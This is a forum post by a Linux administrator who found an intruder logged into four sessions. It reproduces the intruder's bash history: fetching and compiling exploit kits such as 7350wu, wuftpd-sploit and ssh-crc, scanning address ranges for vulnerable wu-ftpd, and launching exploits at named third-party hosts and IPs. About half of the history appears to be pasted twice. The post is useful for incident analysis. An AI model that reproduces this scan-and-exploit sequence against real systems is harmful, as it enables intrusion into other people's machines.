HACKER caught red handed on my linux box..

CAN SOMEONE TELL ME WHAT THIS GUY IS DOING ON MY LINUX BOX??? IT LOOKS HIGHLY SUSPICIOUS.. I was in a linux shell doing my daily chores when I decided to run the command "w".. I saw 4 sessions logged in under one account, so I looked at his bash history and I think he's hacking..... Try to decipher what he's doing...

With all this suspicious activity going on, I looked at his bash history and there were all these files like EXPLOIT, HACKS, etc. being downloaded.. So as he was continuing all of this, I decided to broadcast a message server-wide... This is the msg I broadcast..

Broadcast message from root:
We monitor all suspicious activity.

As soon as I did that, he just stopped everything.. from all 4 connections.. I just saw "-bash" and nothing else.. Afterwards, he just logged off..


HIS WHOLE BASH_HISTORY....


./ft www.namkang.co.kr
PuTTY www.namkang.co.kr
ls -la
./sco lia.ac.id
ls -la
nslookup uph.edu
nslookup www.uph.edu
nslookup www.uph.edu
pico locale.c
gcc -o locale locale.c
ls -la
gcc -o lo locale.c
pico locale.c
pico locale.c
gcc -o lo locale.c
pico locale.c
gcc -o lo locale.c
ico alpd
pico alpd.c
gcc -o alpd.c alp
gcc -o alp alpd.c
ls -la
alpd
./alpd
alp
./alp
alp 24.1
./alp 24.1
./alp 202.53.225.133
./alp a
./alp 202.53
ls -la
rm id.log
telnet www.faithradio.com
209.207.253.67./ft
ls -la
./ft
PuTTY
./su
./wu
./wu -h
./wu -t 209.207.253.67
pico ani.c
gcc -o ani ani.c
./ani
./ani www.faithradio.com
ls -la
./ani www.faithradio.com
id
./tembak 202.152.37.58 53
./tembak 65.168.52.33 53
./tembak 65.168.52.33 53 |w
cd domba
ls -la
./btx www.richardpaul.com
./btx www.reseparkera.nu
./btx bsd1.golffans.com
./btx faithradio.com
./btx www.faithradio.com
./btx oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.mdlawnet.com
./sco www.lighthouse-studios.com
ftp thugscript.net
ls -la
./apache
./apache
chmod +x apache
ls -la
./apache
./apache 130.94.172.9
./apache 130.94.172.9
chmod +x wu
./wu
try -h
-h
./wu -h
./wu id >> id.log
./wu 130.94.172.9
./wu -t 130.94.172.9
./wu -tl 130.94.172.9 sukses
./wu -t 130.94.172.9
(./wu -p 2 -d 0xff4 ; cat
ls -la
]
/wu -p 2 -d 0xff4 ; cat
./wu -p 2 -d 0xff4 ; cat
pico c.c
gcc -o c c.c -lrpcsvc -lnsl -lsocket
ls -la
./wu
./wu -t 165.34.678
pico tembak.c
gcc -o tembak tembak.c
./tembak
./tembak 202.53.225.133 53
./tembak 65.168.52.33 53
LS -LA
ls -la
cd domba
ls -la
pico sco.c
gcc -o sco sco.c
ls -la
./sco www.k-times.com
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.gtaaaco.org
./sco sigma.cav.udesc.br
./sco ptsb.plateau.com.my
./sco mail.comab.com.br
./sco mail.comab.com.br
./sco unix.harrisondigital.com
./sco sail.nic.in
./sco www.shayne.com.tw
./sco www.mvp.gov.ba
cd domba
ls -la
cd Linux
ls -la
lynx http://packetstormsecurity.org/0012-...50wu-v5.tar.gz
ls -la
tar -zxvf 7350wu-v5.tar.gz
ls -la
cd
cd 7350wu
cd 7350wu
ls -la
cd domba
cd Linux
cd 7350wu
ls -la
pwd
cp 7350wu.c /home/ihcrew/domba/Linux/
cd ..
ls -la
cd vetescan
ls -la
cp z0ne /home/ihcrew/domba/Linux/
cd ..
pwd
ls -la
./zone tw -o >> tw.log
./z0ne tw -o >> tw.log
cd ..
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/expl...ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Explo...-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/expl...ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Explo...-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c

----

This is where he received the broadcast message; a few mins later he was idle, then after 5 mins he logged off all 4 connections.. all from different IP addresses..
